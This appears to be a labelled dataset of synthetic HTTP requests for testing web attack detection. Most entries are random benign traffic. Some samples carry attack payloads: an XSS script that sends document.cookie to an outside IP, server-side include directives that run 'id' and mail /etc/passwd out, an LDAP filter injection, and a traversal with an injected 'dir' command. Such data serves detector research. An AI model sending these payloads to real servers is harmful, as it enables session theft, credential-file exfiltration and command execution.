Cookie: hnba0uao=inE;E3onHOoo=%n;oGtsaztdrigliz=aueqrokueoeaur;rmO.X=rRrselecthtx@tbm;eelmwtij=a%dahtFeasai9;Aype=UpeuvitGzssne
Cookie2: $Version="614"
Date: Fri, 30 Mar 07 21:19:02 GMT
ETag: "3EIAijE5EvtBUf@9"
Expect: 100-continue
From: sfno39@ReecNnett.gov
If-Modified-Since: Wed, 01 Aug 07 16:15:07 UTC
If-Unmodified-Since: Sat, 29 Oct 05 17:14:48 GMT
If-Match: *
If-None-Match: "Rvf0wQm4aRurNjN1Idd"
If-Range: Sat, 02 Jun 07 23:51:52 UTC
Max-Forwards: 605
MIME-Version: 6.0
Pragma: tdjnk6=a2rrOE6n
Proxy-Authorization: NTLM ZHdvbWdUdGVvbnNuZWhtTW51Z3MxdGRubTZMdG9DcklyVGV0aHNiZ25raGV1cmhj
Authorization: NTLM Z2dpbWFhSnRlNWlpZU9tamJhMXd0OWVvbm94Y3RNc3RudGZsbjdsbjg=
Range: 05745-,56-61
Referer: /hoaa/unyEb/qsiat3ip.exe
TE: trailers,gzip,deflate;q=0.9
Trailer: Referer
User-Agent: sQq.Ou@lc http://www.ai9eaO.fr
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 033x3612
Via: ehij7/5.3 www.doitbs.tiff
Transfer-Encoding: identity
Upgrade: ehv0/7.8, SiHUl/4.9, cp2e3d/9.0
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30365
Start - Id: 12786
class: Valid
GET /iH.K/t8mornHorsFgiy/Lzqbppusru@.4betweenL/7S1obneQh14w4/cbsebi92ahro0aeaedew/wichhliltoejnefNVn/egtosecmeeibo/oaeoexooneui4ies6RA/RQwWZef.mdb? HTTP/1.0
Host: www.OshaiTii.fr
Connection: jRr2au
Accept: application/zip;q=0.3, text/*, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: iniluh7-ch, n-lrPme8h;q=0.4, pstmhA-dtw
Cache-Control: only-if-cached
Client-ip: 132.64.16.85
Cookie: pDnwbstxh5ei=oeXf;cHNm1wrmtact6r=replacet
Cookie2: $Version="56"
Date: Sat, 31 Jul 04 11:56:40 CET
ETag: W/"MzmUREczAFRQxPsV"
Expect: 100-continue
From: 2ttaM@etgid.uk
If-Modified-Since: Thu, 29 Mar 07 12:59:22 UTC
If-Unmodified-Since: Tue, 08 Sep 09 13:01:32 CET
If-Match: *
If-None-Match: *
If-Range: "mlR@Bv@5@kFMhWM"
Max-Forwards: 795
MIME-Version: 0.2
Pragma: simi7='idgsaBe'
Proxy-Authorization: h2nto aMNln=ehlk
Authorization: Digest nonce
Range: 880687-,10-
Referer: /kenoyhSb/xQc5a/Esze5mol/einutsl/Hens.dll
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: hQnzCADC http://www.neUuiatr.com
UA-CPU: MIPS
UA-Disp: 935,0651,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3357x7611
Via: 4.1 www.dBymlA.css, plco/7.0 180.159.79.194:51
Transfer-Encoding: gzip
Upgrade: DoR/2.1, rahogo/2.6
Warning: 738 www.mdRbith.jpeg "5erngdnraionsLeaa6n" 
X-Forwarded-For: 192.196.28.56
X-Serial-Number: 3346071128
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12786
Start - Id: 6610
class: Valid
PUT /mST/eyKei9vL6_o/uvLjsWm1O.VL9C/eyere/fS.dRg0al/t6-fO/pi/XWiBHBKUuniongroup by/r6YgBmK9T3GzHyLNjVY/Dsv3oPdVPgv/wruaeoihoa3nU/sdvU0hIYsH@9HwHW6TH.php4? HTTP/1.1
Content-Length: 44
Content-Language: bEaeOs
Content-Encoding: deflate
Content-Location: /67X5eb/toywlbka.png
Content-MD5: Y3JtOXRjeXRmYWVvZGtudw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Nov 08 04:02:05 GMT
Last-Modified: Sat, 20 Aug 05 19:04:56 CET
Host: 47.127.101.42
Connection: teaoi
Accept: text/*;q=0.0, application/postscript;q=0.9, image/png;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: dftR-hoxehs;q=0.3, 0sehr-nlPvt5e, 4oehdsz-lh
Cache-Control: no-cache
Client-ip: 76.48.3.104
Cookie: ZenwtqK=3080757
Cookie2: $Version="495"
Date: Mon, 08 Mar 04 14:03:08 CET
ETag: "uEZOaN7qp0BgGdGJ95"
Expect: 100-continue
From: bshjend@msHd1worO.de
If-Modified-Since: Wed, 25 Nov 09 20:29:20 UTC
If-Unmodified-Since: Sun, 22 Mar 09 11:29:15 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 11 Nov 08 11:40:07 CET
Max-Forwards: 3176
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic ZGl1dG5hNHI6ZTFwZnJyc2c=
Authorization: hoie 6hybuke=teTdibs
Range: 349575-,-01819
Referer: http://www.rosesm.gov/is8iee/eha2E32/rrothEt4/vsao7i13.asmx
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/3.0 (compatible; utad; Mac OS X; zeeensdAi; i953N; ef8s)
UA-CPU: PowerPC
UA-Disp: 3961,730,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2928x871
Via: HTTP/0.0 www.oAze.html, HTTP/5.1 www.os0rkr0s.css
Transfer-Encoding: deflate
Upgrade: o2re/0.7, sesri/3.6
Warning: 107 4.57.179.221 "8neA" 
X-Forwarded-For: 101.21.26.57
X-Serial-Number: 43970651738336527001
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aa3cLt6soevy1=ii&19sel6se= qCat i%e-hRn\

End - Id: 6610
Start - Id: 28506
class: Valid
GET /57eGdocumentkncJvfu/bb5Z/-cM/41tnoletxYnndasrca/igilfaau21s/IFnI/a-t/aj16Ob8/mnhh9njpii6ri8te8.jpg?0oice=saneAei9osmiIit9r7&4pmix7gmnnxOtr=wOc&ciewbsh=6351&rgnxnssfm4fls=sehfhrwp-s%3Copen%3D7%3E0o&lsbe=pEGpJHB_t&fEpi4A6t6tsel=tScHeteuoezld HTTP/1.1
Host: 134.236.255.184:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, gzip;q=0.9, gzip, deflate;q=0.7, gzip
Accept-Language: 9-enr, yihano-naabuses
Cache-Control: max-stale
Client-ip: 229.55.227.78
Cookie: sSzunionz.p3from=seorid
Cookie2: $Version="2"
Date: Wed, 24 Feb 10 09:34:02 CET
ETag: "vfM25fxwx3Yntzb"
Expect: it3AnCte
From: Hiedyo@ds6eekiny.org
If-Modified-Since: Tue, 08 Jul 08 18:27:07 UTC
If-Unmodified-Since: Sat, 09 Jul 05 17:35:25 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Jun 04 04:01:20 GMT
Max-Forwards: 4
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic ZmVhRG9vMXg6dG5ydGRjZW4=
Authorization: eipuTg 1streav=oteult
Range: 7467-
Referer: /m2aai/oiae/ttatmn/uhceoja/eiiljEz6.msf
TE: chunked;q=0.8,trailers,chunked
Trailer: If-None-Match
User-Agent: y9zUAE http://www.awtrmy.ch
UA-CPU: PowerPC
UA-Disp: 8399,990,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: Esulto/7.7 www.onbvP.htm
Transfer-Encoding: e9of; eietatgh=dmnab
Upgrade: t5rg/1.6
Warning: 758 139.134.163.207 "9ssartsdi" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 9412157070981544486
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28506
Start - Id: 21294
class: Valid
GET /EHGBf.mspx?63Cydu=tR6&wix=oxyyundsgMn1fw HTTP/1.0
Host: 126.143.26.140
Connection: keep-alive
Accept: image/jpeg;q=0.4, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: on-txfocosr;q=0.2, fsnte8rt-k3ex;q=0.9, n7etni-eohuC1sa;q=0.0
Cache-Control: no-transform
Client-ip: 244.23.171.252
Cookie: ccrheintgiuzir=tnQ9WHjBiHZ5
Cookie2: $Version="565"
Date: Wed, 09 Dec 09 17:12:01 CET
ETag: "7JPhTD.mU--K8DSfmu"
Expect: 100-continue
From: uFsjReir@efen.biz
If-Modified-Since: Sun, 25 Jul 04 05:00:37 GMT
If-Unmodified-Since: Wed, 06 Jan 10 17:24:15 CET
If-Match: *
If-None-Match: "dWQp5iuF8BnVmC.d"
If-Range: Fri, 16 Jan 09 19:51:12 GMT
Max-Forwards: 41
MIME-Version: 6.6
Pragma: v=iw6i3LN
Proxy-Authorization: NTLM T2VhbmFpbm05Y2hydW43d3BBZUpsZWNvYnIxN3JyTWZubmh5U2FlN0V0ZW94d3Q=
Authorization: Basic dGhsNXdnZXU6cml0MQ==
Range: 393683-894,-63,5-069
Referer: http://www.noafs1.gov/rae5ss/3mfio.asp
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 7.6; rd-vo; rv:1.3.6) Gecko/80850879
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 714x7693
Via: HTTP/1.6 120.119.213.238, eeu/0.6 248.58.14.255
Transfer-Encoding: compress
Upgrade: jo1s/5.7, pd21Xt/6.2, eoio/7.4, oeOe5h/7.8
Warning: 749 www.en5tssls.jpg "nqn0" "Mon, 30 Aug 04 15:46:19 UTC"
X-Forwarded-For: 56.53.73.85
X-Serial-Number: 900444
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21294
Start - Id: 28333
class: Valid
GET /ez53ly6Lw/eeoi3oeahttnrTen/Y.updateRDmG.aspx? HTTP/1.0
Host: www.whndimdoie.com:80
Connection: cfwdOd
Accept: application/*, video/*;q=0.8, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: m-rn;q=0.5
Cache-Control: only-if-cached
Client-ip: 23.186.14.165
Cookie: rqtbr=l netcatiytd%aatnunion;l3hc=2;luXihyK=9Ezls1T;n4LodsSo=172813
Cookie2: $Version="46"
Date: Fri, 30 Apr 04 01:34:47 UTC
ETag: W/"mfRHSAnTHE94RQ5"
Expect: 100-continue
From: uo4ee7@tp9n.net
If-Modified-Since: Sat, 19 Aug 06 10:00:31 UTC
If-Unmodified-Since: Sat, 22 Oct 05 05:53:45 CET
If-Match: *
If-None-Match: "kBM4-Vs9ChiD@MiV0N"
If-Range: "y9weTqcgyF.@QxXr"
Max-Forwards: 97
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="pniifin"
Authorization: Digest nonce
Range: -665,-24
Referer: /adtq/irverba/acm6Qni/2guaOhrm/kavueetb.jsp
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.7 (Windows; U; WinNT 6.5; cb-rn; rv:1.3.0) Gecko/06125224
UA-CPU: MIPS
UA-Disp: 853,814,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 680x9650
Via: 9.5 www.rgslG5.jpg:5685, 0.9 153.123.184.215
Transfer-Encoding: gzip
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 910 174.225.28.73:60 "3c3tmk" "Tue, 01 May 07 22:58:38 UTC"
X-Forwarded-For: 26.108.59.18
X-Serial-Number: 4245119888
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28333
Start - Id: 5
class: Valid
GET /2m6VLb1r37jSPC/cWVv/Mbar/oqrd0/msc/etceebwgi/iO/m2zXMv/r@i98toR3YBbLcn.css?upcthyrsrtztir=90&o@gCv=uy&l6=S4&nrtrzevjgah=34&ws58dbd=alVautoexec6ndymlh%5C&cdz4ethpd=dh3Heawtuk&re4le=hte9asCnrtiptlr+&rzAurgneasae=%25cnsdgtdEJpm&1hyMcf0OiS2gaod=6134&m7mfa9oalh=h9ltfeldjegtrtsa&8lYD3esrha=nRhITkNzE&nbt=scwHpJp_Jj0I&c5nArae5tel=ehjrFrnekbidItx&ZlflsWTtuzwl=wolXIZ HTTP/1.1
Host: www.6aie2.de
Connection: lpttOm6
Accept: text/*, text/plain;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale=147
Cookie: oarraatavd=tisrP3n5mopsy;C.psdnB=87378
Cookie2: $Version="382"
Date: Mon, 04 Jun 07 11:53:54 CET
ETag: "BHguteYlkzVlB07GD.X9"
Expect: 100-continue
If-Modified-Since: Thu, 08 Jul 04 03:25:10 GMT
If-Unmodified-Since: Wed, 29 Nov 06 01:48:48 CET
If-Match: "6lXCNJQq5ViZEstji"
If-None-Match: *
If-Range: *
Max-Forwards: 415
Pragma: vthu=ifdlS4il
Authorization: Basic dHNzcmhuOnRhNmVib2E=
Range: 91030-90141
Referer: /nypSnllq/touftres/e9eo/Ejrcesi.msf
TE: gzip;q=0.1,trailers,trailers
Trailer: TE
User-Agent: daHeHds/8.3
UA-CPU: MIPS
Via: HTTP/8.5 38.114.179.225
Transfer-Encoding: compress
Warning: 092 www.bnp6yotc.jpg "It5ru0hZb2OxuMoerlh" "Fri, 11 Dec 09 19:58:51 GMT"
X-Serial-Number: 157557837076027

null

End - Id: 5
Start - Id: 47607
class: XSS
GET /y4erh61ehTwo1bEn3rEe/nygf8ma0uoqTkhfi/oeofnonsonat/v5Fzdd/g6K/opb4Xabv.jsp?8g%umk0kp7wV=4%26wtcoivhrma&wxw3moX=2&riehom=oaohnzEagahn&iazqk=+djwD9ouh%2Bsf&dfkcu=89657306&rhjn=mshutdown0d&9rgyjANd=e0Dq-V&2Z_bodymPjDupdatemeta=okn%24on2%2Bmm0&Nwzrh2tNse=%5B%5CxC0%5D%5B%5CxBC%5Dscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F170.27.88.130%2Fli.dll%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+++%3E HTTP/1.0
Host: www.eIatGe6.be
Connection: keep-alive
Accept: text/*;q=0.6, audio/x-wav
Accept-Charset: x-mac-hebrew, x-mac-hebrew;q=0.4, macintosh;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: thhdorg=trlnttre
Client-ip: 179.141.108.140
Cookie: qtt4B8ncp=formarph;-netcatkEYlEEPI=2411
Cookie2: $Version="75"
Date: Thu, 27 Sep 07 05:51:57 GMT
ETag: "nwTH@gkWC5HyBDgr7v"
Expect: pUonr4u1
From: b5GeiRai@2s2t.st
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 19 Jan 09 20:23:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 8.3
Pragma: hryrcpe=7iap
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 849916-
Referer: /seltQr/rh7rnlw/ss8h/sodelo.asmx
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: NiEeotatg/2.2
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: HTTP/2.6 248.20.67.74, 0.8 www.ocdy9ie.jpg, 2.1 33.36.17.255
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 779 www.tenh.tiff "Ceiaa" "Sun, 15 Feb 09 12:38:53 UTC"
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47607
Start - Id: 2709
class: Valid
GET /Aw64xreYhDu4/k9kOeaG/mdIwoXA_v@PVufiVsL/lsil1NsberrcHeNke87/e0g@6Nef4dP/7-HP9Q3z/eIFiRqmY/iYMf8/boqmochaIJh7formJelog.php?soa4t=rsrh&roepchnhts=3519400212&sidAddob0=o9sipaeduii50sendt&AysFheNsd=51880046 HTTP/1.0
Host: www.kgehdkm0pe.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: focot-hbTLaaw;q=0.0
Cache-Control: only-if-cached
Client-ip: 118.196.176.82
Cookie: eeytq3sv9ax=98403;l5ynbct=hhgioB7;eOdtr0unT=5;dnarfrm3o=cstaoewexecd1mehrcp;1teerohMaul8bh8=e_@KBK9h7_2F;ossaerdnbze=92
Cookie2: $Version="680"
Date: Wed, 04 Jun 08 07:07:41 UTC
ETag: "tItqd5tA_J@DpVg"
Expect: 100-continue
From: 5ars@nlasbuse7.gov
If-Modified-Since: Fri, 06 Feb 04 01:22:25 GMT
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0800
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: TDiak nmect4=aIienlh
Range: 800-526712,0803-
Referer: /enTF2htu/h6tde3e/smdddjt/igitg.msf
TE: trailers,deflate,deflate
Trailer: Warning
User-Agent: Mozilla/4.4 (Windows; U; Windows NT 0.7; im-Dk; rv:0.8.8) Gecko/46766603
UA-CPU: 68000
UA-Disp: 153,380,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 486x934
Via: Nvgmhr/2.2 14.177.150.139, 1.7 141.200.102.216, FTP/6.2 179.46.11.20
Transfer-Encoding: deflate
Upgrade: foys/2.8, sSboa/7.3, alt/9.7, arhxe/9.3, g5ee4a/9.9
Warning: 618 www.isvroab.html "hmysacdeseenneluAtm" "Fri, 02 Jun 06 09:20:31 CET"
X-Forwarded-For: 45.109.116.108
X-Serial-Number: 053261538285243
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2709
Start - Id: 39866
class: SSI
GET /ruL/bVWWkh/rJCoFj-19/776oB5HMeir.M/efdsmode6jesttd/fvE7ulmu1hnaune/ostisoug/lm4wGKfPMfLi/eeR/qYreplace%uWUjQJm5usr/ynito7dngartl/o5qx3.mspx?tnnf7e5l=6&LB0SLTysC=tpassthrutnceZohsr%3BnTl&vnosidnkeNUo=auxir&oei9srera0itl=7660531&NOhcatEfSXiV4y=Ttelnet3eftWWggutni&iltihtitga=bx3-op%5ClTinclude8&lzc=i&Ksadhnrasipn=krTaaaiT%26c&ar=4512535761&yiegE=wh&wfxTqdtasr1ei=8058762&pnasx3=%278Na+e%25p%3Dmtc%29aho9jna&srocdres=h8Dq5&iIoeKitshdr4aL=nTnxrlq1n9uiawmaIr HTTP/1.0
Host: www.dunki.be
Connection: keep-alive
Accept: audio/*;q=0.2, application/zip;q=0.0, text/plain
Accept-Charset: *
Accept-Encoding: compress;q=0.8, identity;q=0.1, compress
Accept-Language: <!    #<!--#exec cmd="id"-->
Cache-Control: only-if-cached
Client-ip: 154.71.56.210
Cookie: rL2=b  r;g8cc6execo.QEE@=\s0document5rsr<netwinnthf;otaoeriajn=o+lcct&%nu8Y;cLlOH=aN5;ei9iIom=oA;nao=jiwfla
Cookie2: $Version="32"
Date: Sun, 16 Nov 08 16:21:05 GMT
ETag: "gzPTBt-Yp3fP3bK"
Expect: a3arm=nRobs
If-Modified-Since: Fri, 25 Apr 08 24:54:57 GMT
If-Unmodified-Since: Sat, 01 Nov 08 09:07:53 GMT
If-Match: "aThUSCW8S2pBosl6F"
If-None-Match: "7uGP4Wbo5qOOdM7.7_b"
If-Range: "quVT77pt3yBxkw-"
Max-Forwards: 8
Pragma: tduku=Eg
Authorization: Basic QWlFb3JhOmVjYTNo
Range: -18262
Referer: http://o1C5.net/3iHeo/6uoDeued.msf
TE: trailers
Trailer: If-Match
User-Agent: <!--#exec    cmd="/bin/mail  dhes5Ywobt.com   <   /etc/passwd"-->
UA-Disp: 991,4045,16
UA-OS: Win98
Via: wdiidu/8.4 www.eIhIn.tiff, HTTP/5.7 www.diod.shtml, FTP/3.6 168.184.182.113
Transfer-Encoding: compress
Warning: 792 82.82.12.49 "ieyi" 
X-Forwarded-For: 37.56.79.152
X-Serial-Number: 14193348040623
----: ---------------------------------

null

End - Id: 39866
Start - Id: 37967
class: LdapInjection
GET /XLO/br7/S95nHwbT3rrF/mEnMdeiUo0C1iuu.swf?asissra=%29+%28%7C+%28displayName%3Dhad*%29+++%28name%3D++had*%29%28++mail%3Dhad*++%29&ctr9rm=4385&eqetedia=%26+ HTTP/1.1
Host: 30.8.190.51:80
Connection: keep-alive
Accept: application/rtf;q=0.8, image/*;q=0.8, image/*;q=0.0
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: eoae-2oi;q=0.8
Cache-Control: no-cache
Client-ip: 163.204.117.84
Cookie: ki7KZ=aszbasetoht;blq5=5;1h0l=euEcmdni$6nr
Cookie2: $Version="030"
Date: Sat, 09 Dec 06 16:44:29 UTC
ETag: "zL8WmoK2XfcVrIe9"
Expect: 100-continue
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Wed, 27 Feb 08 04:17:54 CET
If-Unmodified-Since: Sat, 03 Jan 04 15:32:51 GMT
If-Match: "S5oSgYbyA8T8uQ7t.Md"
If-None-Match: *
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 8111
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM MmFuZXR0OGVpcmNvZWlhc3JzcjNhaGxoQ21XYW90b3NUcm1lbGR2YXMwbw==
Range: -8,482604-
Referer: http://www.lnro.gov/Rlus2zLb/atLTe9vV/hemus64r/elet6/ckmakoDe.pdf
TE: deflate;q=0.8,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 7.7; ie-wd; rv:9.2.4) Gecko/21350625
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: HTTP/3.3 143.49.43.33, 9.5 207.89.213.104
Transfer-Encoding: identity
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37967
Start - Id: 8361
class: Valid
GET /bdvmshtZnaShOsLvgpir/ptOet7/mzE1r8/nr/i65ZZBhShTv@cObHPR/sJbisqjasry/ciTi6DJCY5I/tZ7Q2mailLQ0xI@bodyMK/tGJjyZ@/nw3j/tu/snaonsihm2eouic1o.mspx?igAasneemanrd4g=t61IwJ&uoh=eetiawahi&a6efavtt=lC-UbFd&sawddteil3=eA6zls&Ve08=4825 HTTP/1.0
Host: www.des3CnOqId.ch
Connection: keep-alive
Accept: text/*;q=0.4, video/quicktime, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=889
Client-ip: 129.213.193.127
Cookie: t4hfymtege=y R;lci5zbinWhKN= 29;pQorUlQAiLD= uk2ihntc
Cookie2: $Version="09"
Date: Wed, 19 Aug 09 08:28:49 CET
ETag: W/"qjBR@eXkBl4jAnqZz"
Expect: 100-continue
From: chtn@qt6hosna.org
If-Modified-Since: Fri, 16 Oct 09 16:17:04 UTC
If-Unmodified-Since: Sat, 26 Aug 06 17:26:32 CET
If-Match: "i8.FnvFx04fA9uUNoe"
If-None-Match: *
If-Range: Mon, 26 Apr 10 21:34:24 CET
Max-Forwards: 68
MIME-Version: 6.6
Pragma: ssserrS='mcx'
Proxy-Authorization: NTLM QXU3eGVlYXRkcW9hZDZpTnR5dHRlRWVkYU1CZXd1bkVldXJlT2lpYWU=
Authorization: Basic QVFzdzN1b3k6ZW9oYg==
Range: -3949,19472-179474,-83888
Referer: http://aR9n.cz/6heos/nhmbsEo/amosysi/nhhaal.dll
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: tPfiupepn (bS9ZFixt; bpz8u1; s12fU9En7)
UA-CPU: 68000
UA-Disp: 283,560,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 569x015
Via: HTTP/4.1 14.185.99.90:693, 6.4 www.eqnie.css:89
Transfer-Encoding: identity
Upgrade: YiTM/8.9, cwneoe/0.3, wmA/1.1
Warning: 337 www.iaIyhdt.gif "trsasselihnc" 
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 482816
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8361
Start - Id: 30297
class: Valid
GET /Idyha5h0rthcosec/pRFv@Fv_1IK07ZQFb/jbsl.css?6ufreiehamhyiu=ijecholkgO&XMjSmochavarbqomHA=td HTTP/1.1
Host: www.Eso3io4g7g.net:22
Connection: keep-alive
Accept: video/quicktime, image/png
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: aqhf4j='dtIdiol'
Client-ip: 125.84.82.200
Cookie: B@fXasTNg=S'6te;vnt=9c]pshNtsraldroperie;RQm6likeOgcT.JA=$h>oilxmlirar0ta;OttDosadoniyn=mMm-5m2wb;1Dmh=17
Cookie2: $Version="18"
Date: Sat, 02 Feb 08 04:38:51 UTC
ETag: "t10SXNymD9X4hzXP"
Expect: l8rlAah=egow7t
From: zrsektq@asetec.cz
If-Modified-Since: Sun, 01 Mar 09 20:44:27 GMT
If-Unmodified-Since: Sun, 16 Dec 07 10:13:20 GMT
If-Match: "Icp5C8rPm@7hp5eP"
If-None-Match: "8D4IjivK0peYi5yLqro"
If-Range: *
Max-Forwards: 8073
MIME-Version: 1.8
Pragma: uethiyt='eGnaeed'
Proxy-Authorization: Basic ZWR0dDpFaGVvOQ==
Authorization: Basic YXRhZXR0OmlwYXlh
Range: 393066-92,-477101,-9505
Referer: /sirtag1/cgtn.dll
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/0.8 (Windows; U; Win 9x 5.7; es-mn; rv:4.5.4) Gecko/94841010
UA-CPU: 68000
UA-Disp: 132,042,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4640x2891
Via: 8.6 www.ayeob.htm, 6.3 98.12.45.220, 9.1 234.57.228.41
Transfer-Encoding: gzip
Upgrade: 1nt/1.0, ro5lno/8.9, ef7eT/2.2, flzros/0.3, raaae/2.1
Warning: 978 www.pil8e.html "ohLjpsuln" 
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 60742
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30297
Start - Id: 36620
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: www.jdeeot.be
Connection: keep-alive
Accept: audio/x-wav, text/xml, text/*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.1, identity, compress, compress;q=0.0, compress
Accept-Language: h6deouhi-ioam7iq;q=0.4, yitoa-pivmh, o6-8roi;q=0.9, eyfrl-gotihh, n6jta-E0o
Cache-Control: max-stale
Client-ip: 34.3.142.249
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="2"
Date: Sun, 04 May 08 08:41:29 GMT
ETag: W/"JDtCZoEZuAvr_k5"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Mon, 04 Jan 10 03:04:48 CET
If-Unmodified-Since: Sat, 03 Mar 07 16:07:00 GMT
If-Match: *
If-None-Match: *
If-Range: "Hy7Yen2Nw_C8liEHvP"
Max-Forwards: 374
MIME-Version: 1.9
Pragma: o='Ui'
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: tDus rndeoby=anuya
Range: 8050-
Referer: /au3li/eytar/hea8terf/eebhUn/pooy.htm
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 6.4; cf-hn; rv:1.8.5) Gecko/91882292
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: deflate
Upgrade: tweo/0.1, sfyot5/8.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36620
Start - Id: 6751
class: Valid
PUT /ftoeEyee/psgHf5lJlogjjR/ewgeit/hnool1ro2ieoehrfe.mspx? HTTP/1.0
Content-Length: 303
Content-Language: odoe0rt0,csejl
Content-Encoding: deflate
Content-Location: http://fTysi.cz/e3isslA/eim8/lei6eIz/ssbr2elk/8gh82szk.js
Content-MD5: YWNlMDh4cGFlb3JsdHQ0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Mar 04 08:23:55 CET
Last-Modified: Fri, 21 Apr 06 23:29:31 CET
Host: 143.188.111.121
Connection: f7eah
